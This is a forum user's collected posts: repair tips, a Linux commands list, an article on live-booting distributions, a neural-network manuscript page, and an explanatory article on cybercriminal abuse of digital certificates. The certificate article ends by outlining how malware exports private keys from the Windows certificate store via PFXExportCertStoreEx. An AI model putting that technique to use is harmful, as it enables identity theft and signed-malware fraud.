Everything posted by Nytro
-
It may be an air "bubble". But if the display works fine, I don't see the problem. If you've already bought it, you can warm it up a bit with a hair dryer, then press and hold on it and hope it disappears. And, preferably, apply pressure from the inside toward the edge, so that if there is air in there, it can get out.
-
Was the photo taken with a 3310? You can't see anything. Take the protective film off first. Then GENTLY stick something in there and see if it moves.
-
51 Useful Lesser Known Commands for Linux Users
By Avishek Kumar, Under: Linux Commands, On: December 24, 2013

The Linux command line is attractive and fascinating, and there is a flock of Linux users who are addicted to it. The command line can be funny and amusing; if you don't believe me, check one of our articles below.

20 Funny Commands of Linux or Linux is Fun in Terminal

It is also extremely powerful. We brought you five articles on "Lesser Known Linux Commands", consisting of 50+ lesser-known commands in total. This article concatenates all five of them and lets you know, in brief, what is where.

11 Lesser Known Commands – Part I

This article was highly appreciated by our readers and contains simple yet very important commands. It summarizes as follows:

1. sudo !! : Forgot to run a command with sudo? You need not retype the whole command; just type "sudo !!" and the last command will run with sudo.
2. python -m SimpleHTTPServer : Serves the current working directory as a simple web page over port 8000.
3. mtr : A command that combines 'ping' and 'traceroute'.
4. Ctrl+x+e : This key combination instantly fires up an editor in the terminal.
5. nl : Outputs the content of a text file with numbered lines.
6. shuf : Randomly selects/permutes lines from a file or input.
7. ss : Outputs socket statistics.
8. last : Want the history of the last logged-in users? This command comes to the rescue.
9. curl ifconfig.me : Shows the machine's external IP address.
10. tree : Prints files and folders recursively, in a tree-like fashion.
11. pstree : Prints running processes with their child processes, recursively.

10 Lesser Known Commands – Part II

This article was again warmly welcomed. The summary below is enough to describe it:

12. <space> command : A command preceded by a space is not recorded in bash history.
13. stat : Shows status information of a file or file system.
14. <alt>. and <esc>. : A tweak that puts the last command's argument at the prompt, most recently entered command first.
15. pv : Outputs text slowly, simulating the typing effect seen in Hollywood movies.
16. mount | column -t : Lists mounted file systems in nicely aligned columns.
17. Ctrl+l : Clears the shell prompt instantly.
18. curl -u gmail_id --silent "https://mail.google.com/mail/feed/atom" | perl -ne 'print "\t" if //; print "$2\n" if /(.*)/;' : This simple script shows a user's unread mail right in the terminal.
19. screen : Detach and reattach long-running processes from/to a session.
20. file : Outputs information about a file's type.
21. id : Prints user and group IDs.

10 Lesser Known Commands – Part III

Getting over 600 likes on social networks and many thankful comments, we were ready with the third article of the series. It summarizes as below:

22. ^foo^bar : Re-runs the last command with a modification, without retyping the whole command.
23. > file.txt : Flushes the content of a text file in a single go, from the command prompt.
24. at : Runs a particular command at a scheduled time.
25. du -h --max-depth=1 : Outputs the size of all files and folders within the current folder, in human-readable format.
26. expr : Solves simple mathematical calculations from the terminal.
27. look : Checks for an English word in the dictionary, right from the shell, in case of confusion.
28. yes : Continues to print a string until an interrupt is given.
29. factor : Gives all the prime factors of a number.
30. ping -i 60 -a IP_address : Pings the provided IP_address every 60 seconds and gives an audible alert when the host comes alive.
31. tac : Prints the content of a file in reverse order (last line first).

10 Lesser Known Linux Commands – Part IV

Our hard work was repaid by the response we received, and the fourth article of the series followed. It summarizes as below:

32. strace : A debugging tool.
33. disown -a && exit : Keeps a command running in the background even after the terminal session is closed.
34. getconf LONG_BIT : Outputs the machine architecture (32- or 64-bit), very clearly.
35. while sleep 1;do tput sc;tput cup 0 $(($(tput cols)-29));date;tput rc;done & : This script outputs the date and time in the top right corner of the shell/terminal.
36. convert : An ImageMagick tool that can turn the output of a command into a picture.
37. watch -t -n1 "date +%T|figlet" : Shows an animated digital clock at the prompt.
38. host and dig : DNS lookup utilities.
39. dstat : Generates statistics on system resources.
40. bind -p : Shows all the shortcuts available in bash.
41. touch /forcefsck : Forces a file-system check on the next boot.

10 Lesser Known Linux Commands – Part V

The commands from here on lean toward scripts, that is, single-line but powerful shell scripts, and we thought to provide at least one more article in this series.

42. lsb_release : Prints distribution-specific information.
43. nc -zv localhost port_number : Checks whether a specific port is open.
44. curl ipinfo.io : Outputs geographical information for an IP address.
45. find . -user xyz : Lists all files owned by user 'xyz'.
46. apt-get build-dep package_name : Automatically installs all the build dependencies of a specific package.
47. lsof -iTCP:80 -sTCP:LISTEN : Outputs all services/processes using port 80.
48. find . -size +100M : Lists all files/folders of size 100M or more.
49. pdftk : A nice way to concatenate many PDF files into one.
50. ps -LF -u user_name : Outputs the processes and threads of a user.
51. startx -- :1 : Creates another new X session.

That's all for now. Don't forget to give us your valuable feedback in the comments section. This is not the end of lesser-known Linux commands; we will keep bringing them to you from time to time in our articles. Till then, stay tuned and connected to Tecmint.com.

Source: 51 Useful Lesser Known Commands for Linux Users
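A handful of the commands above can be tried safely in any shell; a quick sketch, writing to a throwaway file under /tmp:

```shell
# Try a few of the lesser-known commands on a throwaway file.
printf 'alpha\nbeta\ngamma\n' > /tmp/demo.txt

nl /tmp/demo.txt       # number the lines (cf. command 5)
tac /tmp/demo.txt      # print the lines in reverse order (cf. command 31)
factor 12              # prime factors (cf. command 29): prints "12: 2 2 3"
```

All three are part of GNU coreutils (or util-linux), so they should be available on any stock distribution.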
-
Adventures in live booting Linux distributions
July 29, 2014 By Major Hayden

We're all familiar with live booting Linux distributions. Almost every Linux distribution under the sun has a method for making live CDs, writing live USB sticks, or booting live images over the network. The primary use case for some distributions is on a live medium (like KNOPPIX). However, I embarked on an adventure to look at live booting Linux for a different use case. Sure, many live environments are used for demonstrations or installations, temporary activities for a desktop or a laptop. My goal was to find a way to boot a large fleet of servers with live images. These would need to be long-running, stable, feature-rich, and highly configurable live environments. Finding off-the-shelf solutions wasn't easy. Finding cross-platform off-the-shelf solutions for live booting servers was even harder. I worked on a solution with a coworker to create a cross-platform live image builder that we hope to open source soon. (I'd do it sooner but the code is horrific.)

Debian jessie (testing)

First off, we took a look at Debian's Live Systems project. It consists of two main parts: something to build live environments, and something to help live environments boot well off the network. At the time of this writing, the live build process leaves a lot to be desired. There's a peculiar tree of directories required to get started, and the documentation isn't terribly straightforward. Although there's a bunch of documentation available, it's difficult to follow and it seems to skip some critical details. (In all fairness, I'm an experienced Debian user but I haven't gotten into the innards of Debian package/system development yet. My shortcomings there could be the cause of my problems.) The second half of the Live Systems project consists of multiple packages that help with the initial boot and configuration of a live instance. These tools work extremely well.
Version 4 (currently in alpha) has tools for doing all kinds of system preparation very early in the boot process, and it's compatible with SysVinit or systemd. The live images boot up with a simple SquashFS (mounted read-only) and they use AUFS to add a writeable filesystem that stays in RAM. Reads and writes to the RAM-backed filesystem are extremely quick, and you don't run into a brick wall when the filesystem fills up (more on that later with Fedora).

Ubuntu 14.04

Ubuntu uses casper, which seems to precede Debian's Live Systems project, or it could be a fork (please correct me if I'm wrong). Either way, it seemed a bit less mature than Debian's project and left a lot to be desired.

Fedora and CentOS

Fedora 20 and CentOS 7 are very close in software versions, and they use the same mechanisms to boot live images. They use dracut to create the initramfs, and there is a set of dmsquash modules that handle the setup of the live image. The livenet module allows the live images to be pulled over the network during the early part of the boot process. Building the live images is a little tricky. You'll find good documentation and tools for standard live bootable CDs and USB sticks, but booting a server isn't as straightforward. Dracut expects to find a squashfs which contains a filesystem image. When the live image boots, that filesystem image is connected to a loopback device and mounted read-only. A snapshot is made via device mapper that gives you a small overlay for adding data to the live image. This overlay comes with some caveats. Keeping tabs on how quickly the overlay is filling up can be tricky. Using tools like df is insufficient, since device mapper snapshots are concerned with blocks. As you write 4k blocks in the overlay, you'll begin to fill the snapshot, just as you would with an LVM snapshot. When the snapshot fills up and there are no blocks left, the filesystem in RAM becomes corrupt and unusable.
There are some tricks to force it back online, but I didn't have much luck when I tried to recover. The only solution I could find was a hard reboot.

Arch

The Arch Linux live boot environments seem very similar to the ones I saw in Fedora and CentOS. All of them use dracut and systemd, so this makes sense. Arch once used a project called Larch to create live environments, but it has fallen out of support due to AUFS2 being removed (according to the wiki page). Although I didn't build a live environment with Arch, I booted one of their live ISOs and found their live environment to be much like Fedora and CentOS. There was a device mapper snapshot available as an overlay, and once it's full, you're in trouble.

OpenSUSE

The path to live booting an OpenSUSE image is quite different. The live squashfs is mounted read-only onto /read-only. An ext3 filesystem is created in RAM and mounted on /read-write. From there, overlayfs is used to lay the writeable filesystem on top of the read-only squashfs. You can still fill up the overlay filesystem and cause some temporary problems, but you can back out those errant files and still have a usable live environment. Here's the problem: overlayfs was given the green light for consideration in the Linux kernel by Linus in 2013. It has been proposed for several kernel releases, and it didn't make it into 3.16 (which will be released soon). OpenSUSE has wedged overlayfs into their kernel tree just as Debian and Ubuntu have wedged AUFS into theirs.

Wrap-up

Building highly customized live images isn't easy, and running them in production makes it more challenging. Once the upstream kernel has a stable, solid, stackable filesystem, it should be much easier to operate a live environment for extended periods. There has been a parade of stackable filesystems over the years (remember funion-fs?), but I've been told that overlayfs seems to be a solid contender.
I'll keep an eye out for those kernel patches to land upstream, but I'm not going to hold my breath quite yet.

Source: Adventures in live booting Linux distributions | major.io
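The OpenSUSE-style stacking described above can be sketched with overlayfs. The paths below are hypothetical, and the mount commands need root privileges and an overlayfs-capable kernel, so they are shown commented out:

```shell
# Directory layout assumed by the overlayfs stacking described above (hypothetical paths).
mkdir -p /tmp/live/read-only /tmp/live/read-write/upper /tmp/live/read-write/work /tmp/live/root

# As root, on a kernel with overlayfs, a live image would be assembled roughly like this:
# mount -o loop,ro root.squashfs /tmp/live/read-only     # read-only squashfs image
# mount -t tmpfs tmpfs /tmp/live/read-write              # writes stay in RAM
# mkdir -p /tmp/live/read-write/upper /tmp/live/read-write/work
# mount -t overlay overlay \
#     -o lowerdir=/tmp/live/read-only,upperdir=/tmp/live/read-write/upper,workdir=/tmp/live/read-write/work \
#     /tmp/live/root                                     # merged view the system boots from
```

Unlike a device mapper snapshot, deleting files from the upper (RAM) layer here frees space again, which is exactly the recovery property the article credits to OpenSUSE.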
-
[h=1]A Brief Introduction to Neural Networks[/h]

[h=2]Manuscript Download - Zeta2 Version[/h]

Filenames are subject to change. Thus, if you place links, please do so with this subpage as target. If you like the manuscript and want to buy me a coffee or beer, please click on the Flattr button on the right. Thanks!

[TABLE=class: inline]
[TR=class: row0] [TH=class: col0 leftalign] [/TH] [TH=class: col1 centeralign] Original version [/TH] [TH=class: col2 centeralign] eBookReader optimized [/TH] [/TR]
[TR=class: row1] [TH=class: col0] English [/TH] [TD=class: col1 centeralign] PDF, 6.2MB, 244 pages [/TD] [TD=class: col2 centeralign] PDF, 6.1MB, 286 pages [/TD] [/TR]
[TR=class: row2] [TH=class: col0] German [/TH] [TD=class: col1 centeralign] PDF, 6.2MB, 256 pages [/TD] [TD=class: col2 centeralign] PDF, 6.2MB, 296 pages [/TD] [/TR]
[/TABLE]

[h=3]Original Version? EBookReader Version?[/h]

The original version is the two-column laid-out one you've been used to. The eBookReader optimized version, on the other hand, has a one-column layout. In addition, headers, footers and marginal notes were removed. For print, the eBookReader version obviously is less attractive: it lacks nice layout and reading features and occupies a lot more pages. However, on electronic readers, the simpler layout significantly reduces the scrolling effort. From now on, during every release process, the eBookReader version is going to be generated automatically from the original content. However, contrary to the original version, it does not get an additional manual layout and typography tuning cycle in the release workflow. So concerning the aesthetics of the eBookReader optimized version, do not expect any support.

[h=2]Further Information for Readers[/h]

[h=3]Provide Feedback![/h]

This manuscript relies very much on your feedback to improve it. As you can see from the many helpers mentioned in my frontmatter, I really appreciate and make use of the feedback I receive from readers.
If you have any complaints, bug fixes, suggestions, or acclamations, send me an email or place a comment in the newly added discussion section at the bottom of this page. You can be sure to get a response.

[h=3]How to Cite this Manuscript[/h]

There's no official publisher, so you need to be careful with your citation. For now, use this:

David Kriesel, 2007, A Brief Introduction to Neural Networks, available at Informatik, Realsatire, Photos. Und Ameisen in einem Terrarium. · D. Kriesel

This reference is, of course, for the English version. Please look at the German translation of this page to find the German reference. Please always include the URL, as it's the only unique identifier of the text (for now)! Note the lack of an edition name: the edition changes with every release, and Google Scholar and CiteSeer both have trouble with fast-changing editions. If you prefer BibTeX:

@book{ Kriesel2007NeuralNetworks,
author = { David Kriesel },
title = { A Brief Introduction to Neural Networks },
year = { 2007 },
note = { available at Informatik, Realsatire, Photos. Und Ameisen in einem Terrarium. · D. Kriesel }
}

Again, this reference is for the English version.

[h=3]Terms of Use[/h]

As of the epsilon edition, the text is licensed under the Creative Commons Attribution-No Derivative Works 3.0 Unported License, except for some small portions of the work licensed under more liberal licenses, as mentioned in the frontmatter or throughout the text. Note that this license does not extend to the source files used to produce the document. Those are still mine.

[h=2]Roadmap[/h]

To round off the manuscript, there is still some work to do. In general, I want to add the following aspects:

Implementation and SNIPE: While editing the manuscript, I was also implementing SNIPE, a high-performance framework for using neural networks with Java. This has to be brought in line with the manuscript: I'd like to place remarks (e.g.
“This feature is implemented in method XXX in SNIPE”) all over the manuscript. Moreover, an extensive discussion chapter on the efficient implementation of neural networks will be added. Thus, SNIPE can serve as a reference implementation for the manuscript, and vice versa.

Evolving neural networks: I want to add a nice chapter on evolving neural networks (which is, for example, one of the focuses of SNIPE, too). Evolving means growing populations of neural networks in an evolution-inspired way, including topology and synaptic weights, which also works with recurrent neural networks.

Hints for practice: In chapters 4 and 5, I'm still missing lots of practice hints (e.g. how to preprocess learning data, and other hints particularly concerning MLPs).

Smaller issues: A short section about resilient propagation and some more algorithms would be great in chapter 5. The chapter about recurrent neural networks could be extended. Some references are still missing. A small chapter about echo state networks would be nice.

I think this is it … as you can see, there's still a bit of work to do until I call the manuscript “finished”. All in all, it will be less work than I have already done. However, it will take several further releases until everything is included.

[h=3]Recent News[/h]

As of the manuscript's Epsilon version, update information is published in news articles whose headlines you find right below. Please click on any news title to get the information.

2012-03-17: EbookReader Versions of Neural Networks Manuscript
2011-10-21: New Release "A Brief Introduction to Neural Networks": Zeta version
2010-11-20: "A Brief Introduction to Neural Networks": English version gets thoroughly reworked!
2010-10-13: "A Brief Introduction to Neural Networks" published in Epsilon2 Version
2009-10-11: "A Brief Introduction to Neural Networks" published in Epsilon Version

[h=2]What are Neural Networks, and what are the Manuscript Contents?[/h]

Neural networks are a bio-inspired mechanism of data processing that enables computers to learn in a way technically similar to a brain, and even to generalize once solutions to enough problem instances have been taught. The manuscript “A Brief Introduction to Neural Networks” is divided into several parts, which are in turn split into chapters. The contents of each chapter are summed up in the following.

[h=3]Part I: From Biology to Formalization -- Motivation, Philosophy, History and Realization of Neural Models[/h]

[h=4]Introduction, Motivation and History[/h]

How to teach a computer? You can either write a rigid program, or you can enable the computer to learn on its own. Living beings don't have a programmer writing a program that develops their skills and only has to be executed. They learn by themselves, without prior external knowledge, and thus can solve problems better than any computer today. What qualities are needed to achieve such behavior in devices like computers? Can such cognition be adapted from biology? History, development, decline and resurgence of a wide-ranging approach to solving problems.

[h=4]Biological Neural Networks[/h]

How do biological systems solve problems? How does a system of neurons work? How can we understand its functionality? What are different quantities of neurons able to do? Where in the nervous system is information processed? A short biological overview of the complexity of simple elements of neural information processing, followed by some thoughts about their simplification in order to adapt them technically.
[h=4]Components of Artificial Neural Networks[/h]

Formal definitions and colloquial explanations of the components that realize the technical adaptations of biological neural networks. Initial descriptions of how to combine these components into a neural network.

[h=4]How to Train a Neural Network?[/h]

Approaches and thoughts on how to teach machines. Should neural networks be corrected? Should they only be encouraged? Or should they even learn without any help? Thoughts about what we want to change during the learning procedure and how we will change it, about the measurement of errors, and about when we have learned enough.

[h=3]Part II: Supervised Learning Network Paradigms[/h]

[h=4]The Perceptron[/h]

A classic among the neural networks. If we talk about a neural network, then in the majority of cases we speak about a perceptron or a variation of it. Perceptrons are multi-layer networks without recurrence and with fixed input and output layers. Description of a perceptron, its limits, and extensions that should avoid the limitations. Derivation of learning procedures and discussion of their problems.

[h=4]Radial Basis Functions[/h]

RBF networks approximate functions by stretching and compressing Gaussians and then summing them, spatially shifted. Description of their function and their learning process. Comparison with multi-layer perceptrons.

[h=4]Recurrent Multi-layer Perceptrons[/h]

Some thoughts about networks with internal states. Learning approaches using such networks, and an overview of their dynamics.

[h=4]Hopfield Networks[/h]

In a magnetic field, each particle applies a force to every other particle, so that all particles adjust their movements in the energetically most favorable way. This natural mechanism is copied to adjust noisy inputs in order to match their real models.
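To give a flavor of the learning procedures summarized above: for a single-layer perceptron, the derivation leads to the classic delta rule (standard textbook notation, not taken from the manuscript):

```latex
% Delta rule: for a training sample with input x, target t, actual output o,
% and learning rate \eta, each weight w_i is nudged in proportion to the error:
\Delta w_i = \eta \, (t - o) \, x_i
```

Repeating this update over the training set reduces the output error, and converges whenever the classes are linearly separable.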
[h=4]Learning Vector Quantisation[/h]

Learning vector quantization is a learning procedure with the aim of reproducing vector training sets, divided into predefined classes, as well as possible by using a few representative vectors. If this has been managed, vectors that were unknown until then can easily be assigned to one of these classes.

[h=3]Part III: Unsupervised Learning Network Paradigms[/h]

[h=4]Self Organizing Feature Maps[/h]

A paradigm of unsupervised learning neural networks which maps an input space by its fixed topology and thus independently looks for similarities. Function, learning procedure, variations and neural gas.

[h=4]Adaptive Resonance Theory[/h]

An ART network in its original form shall classify binary input vectors, i.e. assign them to a 1-out-of-n output. Simultaneously, the so-far-unclassified patterns shall be recognized and assigned to a new class.

[h=3]Part IV: Excursi, Appendices and Registers[/h]

[h=4]Cluster Analysis and Regional and Online Learnable Fields[/h]

In Grimm's dictionary the extinct German word “Kluster” is described by “was dicht und dick zusammensitzet” (a thick and dense group of something). In static cluster analysis, the formation of groups within point clouds is explored. Introduction of some procedures, comparison of their advantages and disadvantages. Discussion of an adaptive clustering method based on neural networks. A regional and online learnable field models a point cloud, possibly one with a lot of points, by a comparatively small set of neurons representative of the point cloud.

[h=4]Neural Networks Used for Prediction[/h]

Discussion of an application of neural networks: a look ahead into the future of time series.

[h=4]Reinforcement Learning[/h]

What if there were no training examples, but it were nevertheless possible to evaluate how well we have learned to solve a problem? Let us regard a learning paradigm that is situated between supervised and unsupervised learning.
Posted on 2009-05-01 by David Kriesel.

Source: A Brief Introduction to Neural Networks · D. Kriesel
-
How Cybercrime Exploits Digital Certificates

What is a digital certificate?

The digital certificate is a critical component of a public key infrastructure. It is an electronic document that associates the identity of an individual with the public key associated with it. A certificate can be associated with a natural person, a private company, or a web service such as a portal. The certificate is issued by an organization, dubbed a Certification Authority (CA), recognized as "trusted" by the parties involved, and is used ordinarily for public key cryptography operations. The Certification Authority issues a digital certificate in response to a request only after it verifies the identity of the applicant. Verification of certificates can be done by anyone, since the CA maintains a public register of issued digital certificates and a register of revoked ones (the Certificate Revocation List, or CRL). Each digital certificate is associated with a validity period, and certificates become invalid once expired. Other conditions that can cause the revocation of a digital certificate are the exposure of its private key and any change in the relationship between the subject and its public key, for example a change in the applicant's e-mail address. In asymmetric cryptography, each subject is associated with a pair of keys, one public and one private. Any person may sign a document with their private key. Anyone who intends to verify the authenticity of the document can do so using the public key of the signer, which is exposed by the CA. Another interesting use linked to the availability of a subject's public key is the sending of encrypted documents. Assuming you want to send an encrypted document to Pierluigi, it is sufficient to encrypt it with his public key, exposed by the CA.
At this point, only Pierluigi, with the private key associated with the public key used for the encryption, can decrypt the document. The public key of each subject is contained in a digital certificate signed by a trusted third party. In this way, those who recognize the third party as trustworthy just have to verify its signature to accept as valid the public key it exposes. The most popular standard for digital certificates is ITU-T X.509, according to which a CA issues a digital certificate that binds the public key of the subject to a Distinguished Name, or to an Alternative Name such as an email address or a DNS record. The structure of an X.509 digital certificate includes the following information:

version
serial number
signature algorithm ID
issuer
validity period
subject
subject public key information
certificate signature algorithm
certificate signature

It is likely you'll come across the following file extensions for X.509 certificates; the most common are:

CER – DER-encoded certificate, sometimes sequences of certificates.
DER – DER-encoded certificate.
PEM – Base64-encoded certificate in a file. PEM may contain certificates or private keys.
P12 – PKCS#12 container; may contain public and private keys (password protected).

Another classification of digital certificates is by intended use. It is useful to distinguish authentication certificates from subscription certificates. A subscription digital certificate is used to establish the correspondence between the individual applying for the certificate and their public key. These certificates are the ones used for affixing legally valid digital signatures. An authentication certificate is mainly used for accessing web sites that implement certificate-based authentication, or for signing e-mail messages in order to ensure the identity of the sender.
An authentication certificate is usually associated with an email address in a unique way.

A digital certificate in the wrong hands

Security experts recognize 2011 as the worst year for certification authorities. The number of successful attacks against major companies reported during the year has no precedent, and many of them had serious consequences. Comodo was the first organization to suffer a cyber attack. Top managers at Comodo revealed that the registration authority had been compromised in a March 15th, 2011 attack, and that the username and password of a Comodo Trusted Partner in Southern Europe had been stolen. As a consequence, a Registration Authority suffered an attack that resulted in the breach of one user account of that specific RA. The account was then fraudulently used to issue nine digital certificates across seven different domains, including: login.yahoo.com (NSDQ:YHOO), mail.google.com (NSDQ:GOOG), login.skype.com, and addons.mozilla.org. All of these certificates were revoked immediately upon discovery. In August of the same year, another giant fell victim to a cyber attack: the Dutch Certification Authority DigiNotar, owned by VASCO Data Security International. On September 3rd, 2011, after it had become clear that a security breach had resulted in the fraudulent issuing of certificates, the Dutch government took over the operational management of DigiNotar's systems. A few weeks later, the company was declared bankrupt. But the list of victims is long. KPN stopped issuing digital certificates after finding a collection of attack tools on one of its servers, likely used to compromise it. The company told the media that there was no evidence that its CA infrastructure had been compromised, and that all incident-response actions had been started as a precaution. Experts at KPN discovered the tools during a security audit: they found a server hosting a DDoS tool. The application may have been there for as long as four years.
Unfortunately, the list of defeats does not end there: in the same period GemNET, a subsidiary of KPN (a leading telecommunications and ICT service provider in the Netherlands), suffered a data breach, and according to Webwereld, the hack was related to CA certificates. The list of victims is reported in the following table, published by the expert Paolo Passeri on his blog hackmageddon.com. It also includes other giants like GlobalSign and DigiCert Malaysia.

Figure – CA incidents occurred in 2011 (Hackmageddon.com)

Why attack a Certification Authority?

Cybercriminals and state-sponsored hackers are showing great interest in the PKI environment, and in particular they are interested in abusing digital certificates to conduct illicit activities like cyber espionage, sabotage, or malware diffusion. The principal malicious uses of digital certificates are:

Improving malware diffusion

Installation of certain types of software (e.g. application updates) requires the code to be digitally signed with a trusted certificate. For this reason, cyber criminals and other bad actors have started to target entities managing digital certificates. By stealing a digital certificate associated with a trusted vendor and signing malicious code with it, attackers reduce the chance that the malware will be detected quickly. Security experts have estimated that more than 200,000 unique malware binaries signed with valid digital signatures were discovered in the last couple of years. The most famous example is the cyber weapon Stuxnet, used to infect nuclear plants for the enrichment of uranium in Iran. The malware's code was signed using digital certificates associated with Realtek Semiconductor and JMicron Technology Corp, giving it the appearance of legitimate software on the targeted systems.
Stuxnet drivers were signed with certificates from JMicron Technology Corp and Realtek Semiconductor Corp, two companies that have offices in the Hsinchu Science and Industrial Park. Security experts at Kaspersky Lab hypothesized an insider job. It is also possible that the certificates were stolen using a dedicated Trojan such as Zeus, meaning there could be more stolen certificates in circulation.

Figure – Digital certificate used to sign Stuxnet

In September 2012, cyber criminals stole digital certificates associated with Adobe. According to security chief Brad Arkin, a group of hackers signed malware using an Adobe digital certificate after compromising a vulnerable build server of the company. The hacked server was used to get code validation from the company's code-signing system.

"We have identified a compromised build server with access to the Adobe code signing infrastructure. We are proceeding with plans to revoke the certificate and publish updates for existing Adobe software signed using the impacted certificate … This only affects the Adobe software signed with the impacted certificate that runs on the Windows platform and three Adobe AIR applications* that run on both Windows and Macintosh. The revocation does not impact any other Adobe software for Macintosh or other platforms … Our forensic investigation is ongoing. To date we have identified malware on the build server and the likely mechanism used to first gain access to the build server. We also have forensic evidence linking the build server to the signing of the malicious utilities. We can confirm that the private key required for generating valid digital signatures was not extracted from the HSM," reported the company advisory (written by Arkin).

Figure – Adobe Breach Advisory

The hackers signed at least two malicious tools with a valid and legitimate Adobe certificate: a password dumper and a malicious ISAPI filter. The two programs were signed on July 26, 2012.
In April 2014, security researchers at Comodo AV Labs detected a new variant of the popular Zeus Trojan, whose code carries a digital signature to avoid detection. This instance is digitally signed with a stolen digital certificate belonging to a Microsoft developer.

Figure – Adobe Digital Certificate abused by cyber criminals

Economic frauds

A digital signature gives a warranty on who signed a document, and you can decide whether you trust the person or company who signed the file and the organization that issued the certificate. If a digital certificate is stolen, the victim suffers an identity theft and its related implications. Malware authors can design a malicious agent specifically built to spread and steal digital certificates. In the case of certificates associated with a web browser, it is possible to trick victims into thinking that a phishing site is legitimate.

Cyber warfare

Cyber espionage, conducted by cyber criminals or state-sponsored hackers, is the activity most frequently carried out with stolen certificates. Attackers use digital certificates to conduct "man-in-the-middle" attacks over secure connections, tricking users into thinking they are on a legitimate site while their SSL/TLS traffic is secretly tampered with and intercepted.

One of the most blatant cases was the DigiNotar one, in which companies like Facebook, Twitter, Skype and Google, and also intelligence agencies like the CIA, Mossad and MI6, were targeted in the Dutch government certificate hack. In 2011, the security firm Fox-IT discovered that the extent and duration of the breach were much more severe than had previously been disclosed. The attackers could have used the stolen certificates to spy on users of popular websites for weeks, without their being able to detect it.
"It's at least as bad as many of us thought … DigiNotar appears to have been totally owned for over a month without taking action, and they waited another month to take necessary steps to notify the public," said Chester Wisniewski, a senior security advisor at Sophos Canada, in a blog post. Fox-IT was commissioned by DigiNotar to conduct an audit, dubbed "Operation Black Tulip," and discovered that the servers of the company were compromised.

Another striking case was discovered in December 2013 by Google, which noticed the use of digital certificates, issued by an intermediate certificate authority linked to ANSSI, for several Google domains. ANSSI is the French cyber security agency that operates with the French intelligence agencies. The intermediate CA had generated fake certificates that could be used to conduct MITM attacks and inspect SSL traffic. Be aware that an intermediate CA certificate carries the full authority of the CA, and attackers can use it to create a certificate for any website they wish to impersonate.

"ANSSI has found that the intermediate CA certificate was used in a commercial device, on a private network, to inspect encrypted traffic with the knowledge of the users on that network."

Google discovered the ongoing MITM attack and blocked it, and ANSSI requested that the intermediate CA certificate be blocked.

Figure – Digital certificate warning

"As a result of a human error which was made during a process aimed at strengthening the overall IT security of the French Ministry of Finance, digital certificates related to third-party domains which do not belong to the French administration have been signed by a certification authority of the DGTrésor (Treasury) which is attached to the IGC/A. The mistake has had no consequences on the overall network security, either for the French administration or the general public. The aforementioned branch of the IGC/A has been revoked preventively.
The reinforcement of the whole IGC/A process is currently under supervision to make sure no incident of this kind will ever happen again," stated the ANSSI advisory. ANSSI attributed the incident to human error made by someone at the Finance Ministry, maintaining that the intermediate CA certificate was used in a commercial device, on a private network, to inspect encrypted traffic with the knowledge of the users on that network.

Misusing digital certificates

Digital certificates have been misused many times during recent years. Bad actors have abused them to conduct cyber attacks against private entities, individuals and government organizations. These are the principal abuses of digital certificates observed by security experts:

Man-in-the-middle (MITM) attacks

Bad actors use digital certificates to eavesdrop on SSL/TLS traffic. Usually these attacks exploit the lack of strict controls by client applications when a server presents them with an SSL/TLS certificate signed by a trusted but unexpected certification authority. SSL certificates are the privileged mechanism for ensuring that secure web sites really are who they say they are. Typically, when we access a secure website, a padlock is displayed in the address bar. Before the icon appears, the site first presents a digital certificate, signed by a trusted "root" authority, that attests to its identity and encryption keys.

Unfortunately, due to improper design and the lack of efficient verification processes, web browsers accept the certificates issued by any trusted CA, even an unexpected one. An attacker that is able to obtain a fake certificate from any certification authority and present it to the client during the connection phase can impersonate every encrypted web site the victim visits.

"Most browsers will happily (and silently) accept new certificates from any valid authority, even for web sites for which certificates had already been obtained.
An eavesdropper with fake certificates and access to a target's internet connection can thus quietly interpose itself as a 'man-in-the-middle', observing and recording all encrypted web traffic, with the user none the wiser."

Figure – MITM handshake

Cyber attacks based on signed malware

Another common cyber attack is based on malware signed with stolen code-signing certificates. The technique allows attackers to improve the evasion capabilities of their malicious code. Once the private key associated with a trusted entity is compromised, it can be used to sign the malware's code. This trick also allows an attacker to install software components (e.g. drivers, software updates) that require signed code for their installation/execution.

One of the most popular cases was the data breach suffered by the security firm Bit9. Attackers stole one of the company's certificates and used it to sign malware and serve it. The certificate was used to sign a malicious Java applet that exploited a flaw in the browsers of the targeted systems.

Malware installing illegitimate certificates

Attackers can also use malware to install illegitimate certificates so that they are trusted, avoiding security warnings. Malicious code can, for example, operate as a local proxy for SSL/TLS traffic, and the installed illegitimate digital certificates allow attackers to eavesdrop on traffic without triggering any warning. The installation of a fake root CA certificate on the compromised system can also help attackers arrange a phishing campaign: the bad actor just needs to set up a fake domain that uses SSL/TLS and passes the certificate validation steps.

Recently, Trend Micro published a report on a hacking campaign dubbed "Operation Emmental," which targeted Swiss bank accounts with a multi-faceted attack able to bypass the two-factor authentication implemented by the organizations to secure their customers.
The attackers, in order to improve the efficiency of their phishing scheme, used malware that installs a new root Secure Sockets Layer (SSL) certificate, which prevents the browser from warning victims when they land on these websites.

Figure – Certificate installed by malware in the MS store

CAs issuing improper certificates

Improper certificates are sometimes issued by the CAs themselves, and hackers use them for cyber attacks. In one of the most blatant cases, DigiCert mistakenly sold a certificate to a non-existent company. The digital certificate was then used to sign malware used in cyber attacks.

How to steal a digital certificate

Malware is the privileged instrument for stealing a digital certificate and the associated private key from the victims. Experts at Symantec have tracked different strains of malware with the capability to steal both private keys and digital certificates from Windows certificate stores. This malicious code exploits the operating system's own functionality: Windows archives digital certificates in a certificate store.

"Program code often uses the PFXExportCertStoreEx function to export certificate store information and save the information with a .pfx file extension (the actual file format it uses is PKCS#12). The PFXExportCertStoreEx function with the EXPORT_PRIVATE_KEYS option stores both digital certificates and the associated private keys, so the .pfx file is useful to the attacker," states a blog post from Symantec.

The CertOpenSystemStoreA function can be used to open certificate stores, while the PFXExportCertStoreEx function exports the content of the following certificate stores:

MY: A certificate store that holds certificates with the associated private keys
CA: Certificate authority certificates
ROOT: Root certificates
SPC: Software Publisher Certificates

By invoking the PFXExportCertStoreEx function with the EXPORT_PRIVATE_KEYS option, it is possible to export both the digital certificates and the associated private keys.
The code in the following image performs the following actions:

1. Opens the MY certificate store
2. Allocates 3C245h bytes of memory
3. Calculates the actual data size
4. Frees the allocated memory
5. Allocates memory for the actual data size
6. Calls the PFXExportCertStoreEx function, which writes data to the CRYPT_DATA_BLOB area that pPFX points to
7. Writes the content of the certificate store

Figure – Malware code to access certificate info

